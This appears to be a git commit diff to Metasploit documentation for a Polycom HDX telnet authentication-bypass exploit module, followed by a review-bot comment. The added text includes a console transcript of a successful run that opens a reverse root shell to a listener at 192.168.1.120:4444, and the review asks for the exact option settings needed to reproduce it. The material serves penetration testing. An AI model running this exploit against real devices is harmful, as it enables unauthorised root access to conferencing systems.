update documentation with verification

Brent Cook 3 years ago
parent
commit
50c918f889
1 changed files with 34 additions and 5 deletions
documentation/modules/exploit/unix/misc/psh_auth_bypass.md (34 additions, 5 deletions)

documentation/modules/exploit/unix/misc/psh_auth_bypass.md

@@ -1,7 +1,36 @@
1 1
 ## Vulnerable Application
2 2
 
3
-  This module exploits the Polycom HDX Video End Points with software <= 3.0.5.
4
-  
5
-  However, due to the price and availability of this device, this module has not been verified by the [msf community](https://github.com/rapid7/metasploit-framework/pull/6960) or [exploit-db](https://www.exploit-db.com/exploits/24494/).
6
-  
7
-  If you are able to test this module, please post results to the [PR](https://github.com/rapid7/metasploit-framework/pull/6960)
3
+This module exploits the Polycom HDX Video End Points with software <= 3.0.5.
4
+It was tested on a Polycom HDX 7000 running software version 3.0.3. Telnet port
5
+23 should be accessible, as it is with the factory default configuration.
6
+
7
+## Verification Steps
8
+
9
+A successful check of the exploit will look like this:
10
+
11
+```
12
+msf exploit(psh_auth_bypass) > use exploit/unix/misc/psh_auth_bypass
13
+msf exploit(psh_auth_bypass) > run
14
+
15
+[*] Started reverse double SSL handler on 192.168.1.120:4444
16
+[*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
17
+[+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
18
+[+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:40186...
19
+[*] Accepted the first client connection...
20
+[*] Accepted the second client connection...
21
+[*] Command: echo xInxktvgUmm7hPyh;
22
+[*] Writing to socket A
23
+[*] Writing to socket B
24
+[*] Reading from sockets...
25
+[*] Reading from socket B
26
+[*] B: "xInxktvgUmm7hPyh\n"
27
+[*] Matching...
28
+[*] A is input...
29
+[*] Command shell session 1 opened (192.168.1.120:4444 -> 192.168.1.155:37728) at 2016-08-01 13:49:06 -0500
30
+[*] 192.168.1.155:23 - Shutting down payload stager listener...
31
+
32
+whoami
33
+root
34
+uname -a
35
+Linux polycom.lan 2.6.33.3-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown
36
+```
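
Review bot: The new "## Verification Steps" section contains no steps, only the transcript of one successful run, and that transcript goes straight from `use exploit/unix/misc/psh_auth_bypass` to `run` even though the output shows a configured target (192.168.1.155:23) and a reverse handler on 192.168.1.120:4444. Please put a short numbered list ahead of the transcript and include the option-setting lines that produced this session, so a tester can reproduce it and compare their output against the sample. The intro line "A successful check of the exploit will look like this:" reads as if it refers to the `check` command while the transcript shows `run`; "a successful run" would be clearer. The first prompt already reads `msf exploit(psh_auth_bypass) >` before the `use` line, which suggests the paste started mid-session and should be trimmed or restarted from a clean prompt. The removed lines carried the links to the PR and the exploit-db entry; consider keeping them as references. The text still claims software <= 3.0.5 while the only tested version stated is 3.0.3, so it would help to say that other versions in the range remain unverified.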
